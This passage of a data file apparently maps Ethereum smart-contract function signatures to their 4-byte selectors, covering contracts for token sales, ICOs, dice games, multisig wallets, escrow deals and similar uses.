"manualBonus()": "0x6f08effa", "BET_TYPEHASH()": "0x4d20d4bc", "pausedTime()": "0xb2cca39d", "specDWallet()": "0xe3e5439c", "InvestorsQty()": "0x589e5edd", "central_account()": "0x50c35227", "BOUNTY_TOKENS_AMOUNT()": "0x495816b4", "fuckynum()": "0xc5135ba0", "randN()": "0xca368538", "TokenSaleStop()": "0xf86ae8b2", "icoCollected()": "0x7d46702b", "wagerIndex()": "0x1a0725ce", "pre_enddate()": "0xfa1f919f", "softCapUsd()": "0x63bce4e7", "totalPresale()": "0x6bd3d406", "THAW_CYCLE_USER()": "0xc0aee5ba", "currentHodler()": "0x6776ddd0", "buyerAddress()": "0x44834aca", "Freeze()": "0x615acbae", "chunkedWeiMultiple()": "0x60f6fb2e", "finishRoundD()": "0x6d32a4a6", "bonusSecondWeek()": "0x34f361a4", "getResolverFee()": "0xc8efd7af", "periodITO_hardCapInUSD()": "0x8239b29d", "createTokenToMarket2021()": "0xcc3c7098", "ERC721Contract()": "0x397e953f", "privateContribution()": "0xef6face6", "BACE_ETH()": "0x923f8455", "start_ts()": "0xf1b2b03c", "toSendLeft()": "0x0350bcd9", "wallet2()": "0x0b8d0a28", "restTokensMoved()": "0xa08e3f0e", "withdrawal1()": "0xdeaa0d0a", "publicOfferingHolder()": "0xe7c6229a", "minLot()": "0xafbd3b7f", "membershipAddress()": "0x1c8a1e20", "latestWinner()": "0x06ef53e0", "buyLCARS()": "0x4281267b", "chfCentsPerTokenWhileBonus()": "0xadd466a4", "unfreezeTimestamp()": "0x5b5416ca", "tokenSaleEnabled()": "0x979cf824", "chests()": "0x797f87ba", "PriceOf1000TokensInUSD()": "0xddc8bb54", "projectFoundersReserved()": "0xb4f48e08", "tickerQuery()": "0xac1ad7d1", "collectWinnings()": "0x634b5043", "OpenTime()": "0xdb51d62b", "givenBonus()": "0x281fa792", "ipo_price()": "0x7ff2c70a", "winAmount2()": "0x7a396264", "bet2()": "0xc41a9892", "MAXIMUM_CONTRIBUTION_WHITELIST_PERIOD_USD()": "0x180773de", "foundersRewardsAccount()": "0xff6f2914", "crowdSalesCompleted()": "0xd21407fa", "TOTAL_TOKENS_TO_DISTRIBUTE()": "0x6359a974", "eth_seed_amount()": "0xc0f57529", "feeToken()": "0x647846a5", "configTimeInit()": "0x8e728fec", "refundMyIcoInvestment()": "0xe84f7054", "Addr3()": "0x4e504313", "teamKeepingSupply()": "0xde3a8511", "contractAddr()": "0x15a5d9d8", "totalAward()": "0xea599cb3", "bonustokn()": "0x621ab11a", "deployedAt()": "0xeae4c19f", "sale_address()": "0x24caf5e1", "race_start_block()": "0x3135ed16", "lastHello()": "0xc9a5003c", "restrictedPercent()": "0x37339506", "RESERVED_TOKENS_ADVISORS()": "0x9b9d2cc8", "supplyPerColor()": "0x9809a38b", "NUM_STAGES()": "0x69b4a1ef", "projectReserve()": "0xcf1e3bcb", "kingBank()": "0xb117a3e8", "addrService()": "0xcdd977e0", "bonussale_EndDate()": "0x08c8b880", "presoldMax()": "0xc2856ca9", "tokensGenerated()": "0x98ff1ba1", "meg()": "0xd0fab480", "percentForSale()": "0xb21ed44e", "isExtraDistribution()": "0xc448fa85", "allowedBuy()": "0xcb795a64", "completeInitialization()": "0x5827b250", "NetfBalance()": "0xfc1e1a32", "deployment()": "0x2dde9aca", "maxAnimals()": "0xc49fef66", "dev_multisig()": "0x9aa035dd", "isLockedOpen()": "0x5ac77ad1", "GAS_REQUIREMENT()": "0x46a2b53e", "airDropTokenEnabled()": "0x51297cc6", "_goldTotalSupply()": "0xfcd8c9d4", "numberOfDays()": "0xe9f6bd0b", "nextDiscountTTMTokenId6()": "0xf1861749", "gameNbr()": "0x3fb92b10", "amountRaisedInUsd()": "0xa2fcd1af", "fourthMonthEnd()": "0xdf6a6002", "tournament()": "0x1e0197e2", "regularMaxPerPerson()": "0xb2db1d23", "juryOperator()": "0xce71caee", "RATE_SALESTAGELAST()": "0x1db19959", "VOLUME_BONUS_CONDITION()": "0x1c35b76f", "CAP()": "0xec81b483", "stopDate()": "0x09799c01", "launchLotto()": "0xa801ea25", "apiCallsContractAddress()": "0xe080b60c", "ROLE_LEVEL_PROVIDER()": "0x87d3764b", "privateLockAddress()": "0x8c9425e4", "freezingPercentage()": "0x6bad8ed8", "reducetime()": "0x391363b5", "finalizeConfirmationPeriod()": "0x9aa5ee73", "devsTokens()": "0x171dde3f", "_owner()": "0xb2bdfa7b", "ethBase()": "0xa37be75f", "pendingUFT()": "0x7191474b", "lrcDeposited()": "0xa8c499a0", "FRAC_TOP()": "0x3876c137", "privateSaleTokensSold()": "0x1ca750f4", "getOTCTotalSupply()": "0x706e5b6e", "HODLaddress()": "0xfde045b9", "balanceTokenContract()": "0x3bc261bb", "tokensPurchasedTotal()": "0x1d7b46b2", "lastFell()": "0x2083f44f", "crownSymbol()": "0x876f20b1", "burning()": "0x4c12b33f", "unproducedCaps()": "0x6f7495cb", "isAuthenticating()": "0x903f2c48", "moleculartechnologySupply()": "0xbc3f7bcb", "boardTokensAddress()": "0xab4865ec", "dKERNEL_PANIC()": "0x322b8c7e", "saleEtherRaised()": "0xd4c8fdae", "secondDueDate()": "0x0eaf94c3", "numCollected()": "0xece44b81", "debug4()": "0xb70902bc", "withdrawBeneficiary()": "0x98a34fef", "ethMinContribution()": "0x41d20767", "buyBack()": "0xacdf4f18", "randomC()": "0x76779829", "tradeStartTime()": "0x2c735ef8", "extOwner()": "0x43722b09", "isPayableEnabled()": "0xdbbc6fcc", "bgxWallet()": "0xc736e118", "canUpdateDeveloperMiningPower()": "0x7f6ae0c0", "tokenExchangeRateMile2()": "0xe5fb08c0", "contentCount()": "0xcc459696", "CROWDSALE_TOKENS()": "0x05d4665f", "PAUSED()": "0xa9aad58c", "randomCount()": "0x70d1cde4", "batchLimit()": "0x474740b1", "teamTokenVesting()": "0x66a9bc0d", "token2()": "0x25be124e", "ETH_MIN_LIMIT()": "0x4f07cc4f", "inflation_complete()": "0x683b4184", "tokenOwnerWallet()": "0x27f39abf", "backDARFtokenOwner()": "0xfe332a0c", "appFundDeposit()": "0x3233b455", "SALE1_END()": "0xb02ef382", "otherF3D_()": "0x4da3b6db", "TOKENS_SOFT_CAP()": "0x3a9f967e", "withdrowETH()": "0xe06e0051", "MIN_CROWDSALE_TIME()": "0x7234ba0c", "saleAgent()": "0xb1d6a2f0", "tokenValueCount()": "0x8312a886", "EARLY_INV_BONUS()": "0xe3d0be5c", "minimalPrice()": "0x25ba2d2e", "GDCAcc03()": "0x62caf484", "getPreIcoInvestorsAddressesCount()": "0x90ce9e5b", "centRaised()": "0x91ac46f5", "nextPremiumSale()": "0xa1f54adf", "PRESOLD_TOKENS()": "0x289cf1e2", "RATE_CROWDSALE_S2()": "0x184ffd9d", "tokensPerOneETH()": "0xa02a338a", "indCommunityDeposit()": "0x2d126d2b", "ethReceivedPresale()": "0xa5cf56f2", "RESERVED_TOKENS_FOUNDERS_TEAM()": "0x4180f6ec", "bountyTokensPercent()": "0x9a3fdfd0", "enableIco()": "0xf472d615", "PUBLIC_SALES_1_PERIOD_END()": "0xb25f8596", "wtToken()": "0x1da74e77", "presaleMinValue()": "0xcf6346cb", "icoTokenCap()": "0x8b29e88b", "G2Ufund()": "0xc251a4e9", "tokensIssuedMkt()": "0xe1c1451a", "endPrice()": "0xb868723e", "stageTwoStart()": "0x1aa5b55c", "privateSell1LockEndTime()": "0x2bf7f6ba", "minContrib()": "0xebc33c51", "total_fund()": "0xa17b229d", "pbkdf2(bytes,bytes,uint256)": "0x15c91115", "hmacsha256(bytes,bytes)": "0x19c32e0b", "round(uint256,uint256,uint256,uint256)": "0x692ad3a9", "salsa20_8(uint256,uint256)": "0x75ee85bd", "columnround(uint256,uint256)": "0x6189be15", "rowround(uint256,uint256)": "0xf2b445ad", "put(uint256,uint256)": "0x541aea0f", "get(uint256,uint256)": "0x669e48aa", "quarter(uint32,uint32,uint32,uint32)": "0x3b996f40", "computeResponseFirstHalf(uint256,uint16)": "0xe6e8c692", "computeResponseSecondHalf(uint256,uint16)": "0x990f3f53", "computeResponse(uint256,uint16)": "0x00b5b223", "verifySecondHalf(uint256[4],uint256[4],uint256[4])": "0x6bc3e0f0", "verifyFirstHalf(uint256[4],uint256[4])": "0x87393bc6", "convictFinal(uint256,uint256)": "0x89495172", "convictInitial(uint256,uint256)": "0x3f5e268f", "convict(uint256,uint256,uint256,uint256)": "0xa068e8d3", "respond(uint256,uint256[4])": "0xc3169ef2", "query(uint256,uint16)": "0x287418e7", "claimComputation(bytes,bytes)": "0x28472c6c", "finalizeNumber(uint256)": "0xd2756e11", "challenge(uint256,address)": "0x141c4e60", "submitProposal(uint256,bytes)": "0x696bda86", "RanDAOPlus(address)": "0xf34ed4e6", "sha(bytes)": "0x34c1b4ba", "getProof(uint256)": "0x11149ada", "startNextGeneration()": "0x434cb64c", "startGeneration()": "0x04106c8b", "amazing()": "0x5cac8b27", "isObsolete()": "0x8ac6a869", "addSnapshot(string)": "0xfee6d28c", "getSnapshot(uint256)": "0x76f10ad0", "snapshotCount()": "0x098ab6a1", "strEqual(string,string)": "0xadd82871", "deleteRef(string)": "0x5ae5df8f", "setRef(string,string)": "0x8bb0faee", "__findRef(string)": "0x7d89ae63", "getRef(string)": "0x9d170c5d", "refName(uint256)": "0x8c79a24d", "refCount()": "0x80d9eaa6", "repoInterfaceVersion()": "0xceebe28d", "MangoRepo()": "0xfce59d0c", "breakCookie(string)": "0xb78bd4a5", "bakeCookie(string)": "0x47b47102", "ChineseCookies()": "0x3288eb0b", "sendCoins(address,uint256)": "0x02ba8742", "LCoin()": "0x21a49ec2", "CanaryV7Fast()": "0xcd591822", "setSeedSourceB(address)": "0x6615dd83", "setSeedSourceA(address)": "0x0c1fad51", "setInvestorLock(bool)": "0xd7206124", "investorWithdraw(uint256)": "0xe6febc9b", "investorDeposit()": "0xe87508be", "raiseMaxNumBets(uint256)": "0x03bda14e", "lowerMinWager(uint256)": "0x67acd805", "betResolution(uint8,uint8,uint8,bool)": "0xe0457884", "combineDice(uint8,uint8)": "0x61886014", "toContractDie(bytes,bytes,uint256)": "0x69bdfd3a", "toDie(bytes)": "0xfe72e717", "findRecentBet(address)": "0xd5a4a3c6", "lookupBet(uint256,uint256)": "0x784813e0", "lookupGeneration(uint256)": "0x44dd4b3b", "funeralAndBirth(bytes,int256,bytes)": "0x99bb875c", "emergencyFuneral()": "0x0fa9ced4", "performAction(uint256)": "0xf004073a", "funeral(bytes,int256)": "0xfed4614b", "needsFuneral(uint256)": "0x62770252", "findSuitableGen()": "0x640f244b", "isSuitableGen(uint256,uint256)": "0xe94a4db1", "becomeMortal(uint256)": "0x2df8e00d", "calculatePayout(uint8,bool,uint256)": "0x21520c5f", "bet(uint8,bool,uint8)": "0x83e78b31", "_parseMsgData(bytes)": "0x827ef325", "parseMsgData(bytes)": "0xb3c1a588", "birth(bytes)": "0x32cea83e", "roomForBirth()": "0x97950740", "needsBirth()": "0x918359c6", "numberOfHealthyGenerations()": "0x89ef40e7", "EtherDice(address,address)": "0xcce81927", "add_funds()": "0xc47bc007", "unlockBets()": "0xa1b9af31", "lockBetsForWithdraw()": "0x46b305d6", "setFeed(address)": "0x55b775ea", "getBetsLocked()": "0x021991e7", "getBankroll()": "0x0d1fce42", "getMinimumBet()": "0x839930ba", "claimTimeout()": "0x0e1da6c3", "canClaimTimeout()": "0xc7cf28fe", "claim(bytes)": "0xc63ff8dd", "getMaxPayout()": "0x2d9a37d3", "calcWinnings(uint256,uint256)": "0x06b5f02d", "didWin(bytes)": "0xf93589ce", "getResult(bytes)": "0xef4592fb", "isReadyFor(address)": "0x2fac1d36", "isReady()": "0xa094a031", "hash(bytes)": "0xaa1e84de", "hashTo256(bytes)": "0x59dac714", "serverSeed(address,bytes)": "0xa48566ba", "roll(uint256,bytes)": "0xaa9669c1", "HonestDice()": "0xa9f6def0", "reservedOperationalExpenses()": "0xdf331545", "TOWN_INCREASE_RATE()": "0x4daea42a", "TokenName()": "0xb6d7855a", "canSaleInfo()": "0xacb74e73", "kingBlock()": "0xee7cf9f2", "stagedVestedLockUpAmounts()": "0xa2f3139c", "CROSAIR_PRICE_INCREMENT()": "0x49fe5261", "StartdatePresale()": "0x6f6007bb", "benecifiary()": "0x754c3957", "Y2_lockedTokenReleaseTime()": "0xde5c995e", "currentRunningAddress()": "0x8561d136", "xra()": "0x8bc008e6", "monsterNFTContract()": "0x3dd287d4", "StopPaymens()": "0xb16d22a0", "lastTwoAmbassadorsAdded()": "0x1162247e", "ethToToken()": "0x789770f4", "earlyTimeLock()": "0xcc70993d", "GOLD_AMOUNT_SKL()": "0xc4c4e3c0", "REGULAR_TYPE_COUNT()": "0x4d6c3427", "currentBoundary()": "0xa4bd7a20", "owner_freeze_start()": "0xe0a29e23", "freeTotal()": "0x8712c1c5", "sessionNumber()": "0x10c7868f", "ALLOC_SALE_GENERAL_1()": "0x2921be51", "lockStartDate()": "0x3795ad25", "MIN_TOKENS()": "0x1965e183", "transFeeCut()": "0x10d58506", "payoutRate()": "0x2b4353f2", "summBilborough()": "0xda652b4a", "winnerTimestamp()": "0x9103e368", "maxTokensRaised()": "0x09838bd9", "gkAddress()": "0x1ba527d6", "pausePreSaleRound()": "0x9975091a", "INITIAL_AIRDROP()": "0xb5922a2b", "PRESALE_TOKEN_IN_WEI()": "0x099583de", "oneImpInWei()": "0xd4638401", "satoshiRaised()": "0x11ca3c63", "refundTime()": "0x9b0ac9b0", "START_TIME_SALE()": "0x6de685f6", "distributing()": "0x12c1083d", "purchasable()": "0x3f3d83c3", "fstSold()": "0x3fdeef90", "thinkMode()": "0xd07c53b6", "privateReleaseTime()": "0x5137de7a", "addressMasterNodes()": "0xde75c36e", "ECO_SYSTEM_BONUS()": "0x1e2ed152", "BONUS_ICO_STAGE1_PRE_SALE3()": "0x96354f6d", "donateForContractHealth()": "0x6eb91683", "phase_3_rate()": "0x2da80893", "payoutOdds()": "0xc44b10d9", "lockName()": "0xc704f7ed", "dividendsIndex()": "0xef5a3a88", "ownerTimeLastMinted()": "0xac185644", "allocate6ProjectToken()": "0x31852a02", "_nonce1()": "0xbf059dc2", "subDevTwo()": "0xf892ee05", "isFundedMax()": "0xf5462105", "sponsoredBonusMin()": "0x2e6b2662", "privilege()": "0x9355eb25", "pvpMaxIncentiveCut()": "0x0c26a816", "desimls()": "0x7780ae85", "numberOfLeafs()": "0x872539e7", "nextlotnumber()": "0x3233c791", "fundForAirdrop()": "0x89dbeb64", "airdropQty()": "0x9703fa2e", "affiliateLevel()": "0x4362c088", "nextProfile()": "0x3c745ad5", "preSaleDistributionContract()": "0x86d12325", "betLow()": "0x8f99d31b", "tokensToBeClaimed()": "0x9d0fb699", "lifeTime()": "0xf4e733c3", "STARTING_SHITCLONE()": "0x0d4766a3", "wildcardCount()": "0x76bf9f57", "totalReimbursedWei()": "0xa156ce7b", "futureRoundWallet()": "0x78c3b3a5", "nextUpgradeAgent()": "0x0a94ece7", "totalEthReceived()": "0xa9a18dda", "sellComission()": "0xa62e5a7d", "ZIGICOIN()": "0x919aa4fa", "issuedTokensForCommand()": "0x1f97f2ef", "soldTokensIco()": "0x13a4fd37", "roundActive()": "0x027471b0", "EMISSION_FOR_TEAM()": "0xe57405e2", "deployerAddress()": "0xefdee94f", "tokenAllocToCrowdsale()": "0x6a10ad64", "apiRegistryContractAddress()": "0x76b69d77", "charityBeneficiary()": "0x77c71396", "crosairVouchersMinted()": "0x8a871c5f", "startMint()": "0x2be09561", "devFeePercent()": "0x3f64a7ab", "nextSaleId()": "0xdeb077b9", "COLOR_BLUE()": "0xfd2cf77a", "maxBetDivisor()": "0x39849771", "unlockSecondaryTokens()": "0x8da5fd77", "forwarders_count()": "0x5fc1afac", "capFinalized()": "0xead0f75a", "gla()": "0xc768051a", "globalSupplyAfterPercentageLogic()": "0xd9db9d89", "chipSize()": "0x6be0c670", "ContributorsSupply()": "0xc0584e68", "previousPublishedVersion()": "0x6104464f", "debug_resizeRealPrefix(uint256,uint256)": "0xf16fa954", "debug_verifySharesTreeSubmission(uint256[],uint256[],uint256,uint256,uint256,uint256)": "0xed47ca94", "verifyPendingShares(uint256[],uint256[],uint256,uint256[],uint256[],bytes,bytes,uint256)": "0xb2b0aefb", "debug_hash256Double_concat(bytes,bytes,bytes)": "0xad076bfc", "debug_getCoinbaseTxOutputLen(uint256)": "0xa68393a2", "debug_blockHeaderMerkle(bytes)": "0x99d1d002", "debug_hash3Byte(bytes)": "0x9559225c", "constructCoinbaseTx(uint256,uint256)": "0x88f6d5a4", "debug_hash256Double(bytes)": "0x88702cc4", "debug_multiplehash(uint256,uint256)": "0x83cd5e13", "debug_hash3Int(uint256)": "0x579d5fba", "submitShares(uint256,uint256)": "0x43c33ac9", "debug_resetuser()": "0x3e2ee39e", "debug_extendCoinbaseTxOutput(uint256,uint256)": "0x2850c72a", "submitFullBlock(bytes,uint256[],uint256[],bytes,bytes,bytes,bytes,bytes,bytes,uint256)": "0x14ca5398", "debug_verifyShare(bytes,uint256[],uint256[],bytes,uint256,uint256)": "0x107b1f8c", "debug_coinbaseTxSha(bytes,uint256)": "0x0bf77989", "getTransferAddressUser(address)": "0xf1679095", "cashout(address,address,uint256)": "0xd126dac4", "changeExchangeContract(address)": "0x9d16aca6", "transferMultisig(address,address,uint256)": "0x6ba2aefc", "setTransferAddressUser(address,address)": "0x527f4ff1", "cashin(address,uint256)": "0x388f3cd3", "transferContractUser(address)": "0x249b4d4f", "coinBalanceMultisig(address)": "0x077dadb2", "getDetails()": "0xfbbf93a0", "addPrescription(uint256,string)": "0xe571fd2d", "createPatient(bytes32,bytes32,uint256,uint256,uint256,bytes32,uint256)": "0xdc3d4203", "changeVaccinHistory(address)": "0xd72dec33", "changeHeight(uint256)": "0x86590955", "prescriptions(bytes32)": "0x7b464e93", "patient(uint256)": "0x74607d91", "getPeople()": "0x4f995d08", "changeWeight(uint256)": "0x38cde380", "purchaseTokens()": "0x3290ce29", "mintTokens(int256,address,uint256)": "0x921b2d64", "arcToken()": "0xc0112678", "tokenContract()": "0x55a373d6", "proxyPayment(address)": "0xf48c3054", "onApprove(address,address,uint256)": "0xda682aeb", "onTransfer(address,address,uint256)": "0x4a393149", "hashtagCommission()": "0xe344606b", "dealStatus()": "0xb85477c5", "approve()": "0x12424e3f", "makeSimpleDeal(address,address,uint256,bytes32)": "0x2dc2dbf2", "validFactories()": "0xf6b44d03", "getRepTokenAddress()": "0xf34f43f6", "commission()": "0xe1489191", "successfulDeals()": "0xcffee328", "metadataHash()": "0xc5a1d7f0", "registeredDeals()": "0xaaf73ef7", "registerDeal(address,address)": "0xa4a75edc", "mintRep(int256,address,uint256)": "0x24664106", "setMetadataHash(string)": "0x7f301b83", "getConflictResolver()": "0x6985e46e", "removeFactory(address)": "0x4b37c73f", "setCommission(uint256)": "0x355e6b43", "addFactory(address)": "0x29ce1ec5", "getTokenAddress()": "0x10fe9ae8", "validFactories(address)": "0x0e4355d4", "seekerValue()": "0xfef1dc7d", "seeker()": "0xf3ab7ea9", "assignTo(uint256,address,uint256)": "0x30cfac6c", "setStatus(uint8)": "0x2e49d78b", "status()": "0x200d2ed2", "payout(address,uint256)": "0x117de2fd", "providerValue()": "0x0e429ecc", "provider()": "0x085d4883", "controller()": "0xf77c4791", "changeController(address)": "0x3cebb823", "cancelDeal(string)": "0xf3227dc4", "hashtag()": "0xf089b7dd", "dispute(string,address)": "0xcdcf0c4a", "makeDealForTwo(string,uint256)": "0xac56c52b", "readDeal(string,address)": "0x5e717e2d", "resolve(string,address,uint256)": "0x2e788443", "hashtagToken()": "0x2de90801", "payout(string)": "0x1504ce95", "fundDeal(string,address)": "0x0a40f15f", "launchLength()": "0xae1a0b0c", "calcMaxWithdraw()": "0x4bc9fdc2", "isUnderLimit(uint256)": "0x11c91914", "isConfirmedByOwners(uint256)": "0x811de206", "changeDailyLimit(uint256)": "0xcea08621", "MultiSigWalletWithDailyLimit(address[],uint256,uint256)": "0x1914427f", "getTransactionIds(uint256,uint256,bool,bool)": "0xa8abe69a", "getConfirmations(uint256)": "0xb5dc40c3", "getTransactionCount(bool,bool)": "0x54741525", "getConfirmationCount(uint256)": "0x8b51d13f", "addTransaction(address,uint256,bytes)": "0xec096f8d", "isConfirmed(uint256)": "0x784547a7", "executeTransaction(uint256)": "0xee22610b", "revokeConfirmation(uint256)": "0x20ea8d86", "submitTransaction(address,uint256,bytes)": "0xc6427474", "replaceOwner(address,address)": "0xe20056e6", "MultiSigWallet(address[],uint256)": "0xe5c46944", "getTokenBalance(address,address)": "0xc489744b", "getDepositAddress(address)": "0xd83a7f67", "getContentTip(bytes32,address)": "0x5a17aa41", "maxSupply_()": "0x097284b2", "getLastInvestors()": "0xe4f95226", "FreeZombieCount()": "0x30cf7af6", "saleInProgressB()": "0x01233474", "minSend()": "0x865508ef", "KYC_USD_LMT()": "0xd399354b", "minMineSize()": "0xebf1356e", "fixamt()": "0x19b985b3", "ICO_CAP4()": "0xa84c6362", "Test4()": "0xbffdf3f1", "EMPTY_PUBLIC_KEY_ID()": "0xea32c95e", "investmentUpperBounds()": "0xad478dda", "rewardsRedeemed()": "0x74f61642", "minimumTokensBeforeSale()": "0x98bcfbb8", "ledMultiSig()": "0xadefd501", "deposit_amount()": "0xbead45cf", "newMasterCopy()": "0x6ea68360", "saleRunning()": "0x3779a3b6", "isTokenRateCalculated()": "0xe51c3257", "PERIOD_AFTERSALE_NOT_TRANSFERABLE_IN_SEC()": "0x573d72b7", "SC_locked()": "0x990a6a64", "sencHardCap()": "0x72879610", "pingBlock()": "0x64d5922f", "accMinterTwo()": "0x38c20499", "projectsCount()": "0xc73b302e", "girlOps()": "0x0a02037b", "SUV_TYPE()": "0x867befba", "_educatedToken()": "0xd1defff2", "HARDCAPPED_SUPPLY()": "0xf344f4fa", "getDirectBoughtTokens()": "0x2490e16e", "contract_verified()": "0xffb40152", "currentPhaseAddress()": "0x2eb0111c", "stage2_price()": "0x30203994", "disableBlackListForever()": "0x838a48d6", "CROSS_RESERVE()": "0xd04206f3", "getFechaTax()": "0xa993e180", "End4()": "0xea359082", "auctionIndex()": "0x7aacf03c", "EthernetCashAddress()": "0x1d411612", "bancorToken()": "0x3b172a32", "holdAmount()": "0x17fc91f8", "bonusUnsold()": "0xa9825b7c", "ICO_TOKEN_CAP()": "0xb6acc48c", "preicoUSD()": "0x9244c21e", "currentRId_()": "0x52357779", "bonusPhaseOneDeadline()": "0x574bea92", "areTokensSold()": "0xa44a00c3", "Public()": "0x5097e51f", "ProjectOwner()": "0x108d6f94", "sellOrderTotal()": "0x212e2596", "token_a()": "0x14a54912", "round5StartTime()": "0xcdc89404", "week1Price()": "0xd445afdc", "grapesToBuildWinery()": "0x88865347", "PUBLIC_SALES_2_RATE()": "0xf7e3f00e", "exchangeRateAt()": "0x9cbf1b85", "publicEnd()": "0x0acae9a7", "account1Address()": "0x9b5cfcdd", "totalWeiDonated()": "0xf6e5c6a4", "referralBountyTokensAddress()": "0x4e8fb35c", "mined()": "0x033c8477", "maximumBaseContribution()": "0xb196aabb", "totalTeamContributorIdsAllocated()": "0x718228fa", "LEADER_FEE()": "0xd5b9df87", "fetchTokenBalance()": "0x50977faf", "Wallet8()": "0x5d451a9a", "setFundingFueled()": "0xb01b8877", "tokenNeedForBonusLevel1()": "0x6b676966", "total_tokens()": "0xc6490835", "secondMonthEnd()": "0xfbb4dc6b", "tokenReleased()": "0x4a76564e", "developingFund()": "0x4537b7de", "lastHash()": "0x3fa21806", "getMinAuditPriceMax()": "0xcdb7ef81", "hipstermasterReq()": "0x33ba2ef9", "isTryedFinishCrowdsale()": "0x8d627e91", "communityTokensAddress()": "0x0f53b7ee", "maximumAdminBalance()": "0xf07edbf4", "lockPriceChange()": "0x6eb5ad4f", "DEFAULT_INITIAL_COST()": "0x4e87c715", "_NT()": "0x29cd7767", "assetMeta()": "0x68621711", "boardAddress()": "0x779454ff", "gasForIAD()": "0x1d38e433", "tokenCreationCapOverall()": "0x7c976dbd", "firstPeriod()": "0xc4e3a63b", "privatePreICOFreeBonusPercent()": "0x50259cd3", "officialGameUrl()": "0x18167416", "totalToSale()": "0xb503fcf3", "baseRate()": "0x1f68f20a", "numberOfTokenId()": "0x9d7b5621", "ACCEPT_EXCHANGE()": "0x3944750d", "PUBLIC_CROWDSALE_CAP()": "0x63d91851", "meetingDate()": "0x83289567", "PRICE_PRESALE_WEEK1()": "0x6540fcc2", "FOUNDATION_RESERVE()": "0x166d91fd", "remainderWallet()": "0x09ac3b00", "getMaximumBetHome()": "0x4d02438b", "tokenCreateContract()": "0xc86e25d7", "minCoordinatorCount()": "0xe177b18b", "TransparencyRelayer(address)": "0x652740a7", "emergency_withdraw()": "0xcbc1cfd2", "set_transfer_gas(uint256)": "0x1d709ab4", "transfer_with_extra_gas(address,uint256)": "0xb68a06ba", "execute_transfer(uint256)": "0xddb141c2", "Coin5941()": "0x885124c0", "BEZOP_EXCHANGE()": "0xee47c809", "PET(uint256,string,string)": "0x50b1ab69", "rewardVote(address,address,uint256)": "0xe7e9e106", "getResults()": "0x4717f97c", "updateRefundWalletAddress(address)": "0xac8641ee", "VotingToken(string,string,uint256,string,string,string,address,address,address,address)": "0x913d6906", "ProofOfBitConnect()": "0x8b91f4a3", "changeDepositWalletAddress(address)": "0x9a900e8c", "buyAMI(string)": "0x3070352b", "AMICoin()": "0x7b6ae58f", "disableManuallyBurnTokens(bool)": "0x71766ae3", "accountBalance(address,address)": "0x887bdcfc", "countAddresses()": "0xec530de6", "addAgingTimesForPool(address,uint256)": "0xea6ca182", "_checkMyAging(address)": "0x1a7aed0e", "_addToAging(address,address,uint256,uint256)": "0x04f342f6", "_addIndex(address,address)": "0x3f0b67e9", "mintToken(address,uint256,uint256)": "0x23a36d2b", "_addDividendsForAddress(address,address)": "0x3581b257", "receiveDividends()": "0x79fc4687", "allAgingTimesAdded()": "0x037ca6c4", "addAgingTime(uint256)": "0x8d37f52c", "CSToken()": "0x0fc38daa", "filterTransactions(bool)": "0x2b9e5088", "parse(string)": "0xbc62d8d8", "Cothereum(uint256,string,string)": "0x9da9650e", "completeTask(uint256,uint256)": "0x108c8ae4", "solveTask(uint256,uint256)": "0x43c37393", "createBitcoinAddressPrefixTask(bytes,uint256,uint256,int256,uint256,int256)": "0x3ba2cfc1", "safeIndexOfTaskId(uint256)": "0x5a525491", "payForTask(uint256,uint256)": "0x83794502", "completedTasksCount()": "0x80fa4517", "tasksCount()": "0xbb6a0f07", "TaskRegister(address,address,address)": "0xbdf4e7c6", "upgrade(uint256,uint256)": "0x451450ec", "Upgradable(address)": "0xcbbdca36", "endUpgrade()": "0x257e1f8f", "startUpgrade()": "0x2239c48a", "isValidPublicKey(uint256,uint256)": "0x3e99c395", "isValidBicoinAddressPrefix(bytes)": "0x22d85334", "countBtcAddressLeadingOnes(bytes,uint256)": "0x86e4a33e", "complexityForBtcAddressPrefixWithLength(bytes,uint256)": "0x39fd615c", "complexityForBtcAddressPrefix(bytes)": "0x4c3221e1", "bitcoinPublicKey(uint256)": "0x0252607e", "mulXY(uint256,uint256,uint256)": "0xd769f32a", "doubleXY(uint256,uint256)": "0xf0daa286", "addXY(uint256,uint256,uint256,uint256)": "0xd09f8b8b", "submod(uint256,uint256,uint256)": "0x40c91c05", "createBtcAddress(uint256,int256,uint256,int256)": "0x36a4f2ba", "createBtcAddressHex(uint256,int256,uint256,int256)": "0xd9ea9bfa", "toBase58Checked(uint256,bytes1)": "0x39614759", "bytesToBytes32(bytes)": "0xbfe370d9", "equalBytes32ToBytes(bytes32,bytes)": "0xf68c5b6a", "equalBytesToBytes(bytes,bytes)": "0x261b4205", "lengthOfCommonPrefix3232(bytes32,bytes32)": "0xe09ded57", "lengthOfCommonPrefix32(bytes32,bytes)": "0xf42f0c7d", "lengthOfCommonPrefix(bytes,bytes)": "0x63079315", "PlazaToken(uint256,string,string)": "0xf48a3f2b", "ReserveCoin()": "0x18a3aad2", "ChargeNetwork()": "0x1b0f5395", "getMedalType(uint256)": "0x3626aae7", "getCurrentTokensByType(uint32)": "0x7800313f", "_createMedal(address,uint8)": "0x92cfd461", "setMaxTokenNumbers()": "0xd939727d", "computeTokenWithBonus(uint256,address)": "0x9d6ad799", "SelfPayPreSale(uint256,uint256,uint256,uint256,uint256,address)": "0x1e625935", "RealEstate()": "0xd09b0ae4", "setRateContract(address)": "0x6b96668f", "setAdvisorFee(uint256)": "0xcd1ce6d5", "setAdvisorAddress(address)": "0x3e6d6a6b", "setWalletAddress(address)": "0xac1a386a", "addMeByRC()": "0x66b52b93", "forward(uint256)": "0x4fa679d8", "buyFromRC(address,uint256,uint256)": "0x4769ed8f", "tokenValueInEther(uint256)": "0x7b413985", "TokenSale(address,address,uint256,uint256)": "0x3aa3f154", "userBalance(address)": "0x0103c92b", "refundEther(address)": "0x1f378b8a", "claimTokenBonus(address)": "0x894d7b08", "giveToken(address)": "0xe26835ce", "takeEther(address)": "0x6d64abd6", "changeMinimum(uint256)": "0x2a513dd9", "setTimeRC(uint256,uint256)": "0x4f7d5de9", "readRate(string)": "0xc97c1505", "Trongold()": "0x0305bdfe", "getbalance()": "0x4d9b3d5d", "withdraw_funds()": "0x2b8f2042", "TerrionFund()": "0xf62847f4", "changeAgency(address)": "0x6a7149f6", "changeManagement(address)": "0xcc44fd2b", "SFT()": "0xc254e4db", "changeTierAdmin(address)": "0x92842802", "rateOfSpecificTier(uint256)": "0x6b588775", "allocateTokens(uint256,uint256)": "0x8fc264e0", "ownerUpdateContractBalance(uint256,uint256)": "0x61fda640", "addContractBalance(uint256,uint256)": "0x78ba24f2", "subContractBalance(uint256,uint256)": "0xe60c11a0", 